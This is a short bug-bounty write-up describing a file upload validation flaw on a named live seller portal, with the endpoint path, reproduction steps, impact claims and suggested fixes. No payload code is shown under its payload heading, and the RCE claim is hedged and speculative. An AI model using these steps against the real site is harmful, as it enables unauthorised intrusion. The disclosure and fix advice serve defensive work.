🐞 Zomato File Upload Flaw: A Closer Look at the Security Oversight

Improper File Upload Validation Leads to Remote Code Execution (RCE) & Stored XSS on seller.hyperpure.com

📌 Summary

During a security assessment of the Hyperpure Seller Hub, I discovered a critical vulnerability in the file upload mechanism at /public/api/seller_hub/logout/document . The backend fails to validate file extensions and MIME types properly, allowing uploads of files like .php and .js .

Although these files are stored in an S3 bucket, they're publicly accessible and may be interpreted by a web server (like Apache/Nginx) if accessed from an app subdomain, enabling RCE or Stored XSS .

🧪 Steps to Reproduce (PoC)

1. Register as a seller at https://seller.hyperpure.com
2. Go to the document upload section.
3. Intercept and modify the POST request to:

PHP Payload:

The uploaded file will be accessible at:

Try accessing it via application domain:

🛠 Impact

• RCE: Server-side command execution.
• Stored XSS: JavaScript injection in dashboards.
• Persistence: Uploaded files remain publicly accessible.
• MIME Bypass: Upload filters can be easily evaded.

⚠️ Severity: Critical (CVSS: 9.8 - 10.0)

• Affects all seller accounts.
• Allows full remote server control or XSS attacks.
• No strong file type validation on backend.
• Files hosted on public S3 without proper ACL rules.

🧩 Suggested Fix

• Validate file extensions and MIME type server-side.
• Reject executable file types (.php, .js, etc).
• Store uploaded files outside of web root or behind signed URLs.
• Apply a strict Content Security Policy (CSP).
• Whitelist only safe formats: .pdf, .csv, .xlsx.

📣 Tags

#BugBounty #Security #RemoteCodeExecution #StoredXSS #Zomato #Hyperpure #Critical #EthicalHacking #FileUploadVulnerability #WebSecurity #ZeroDay

🎥 Video Explanation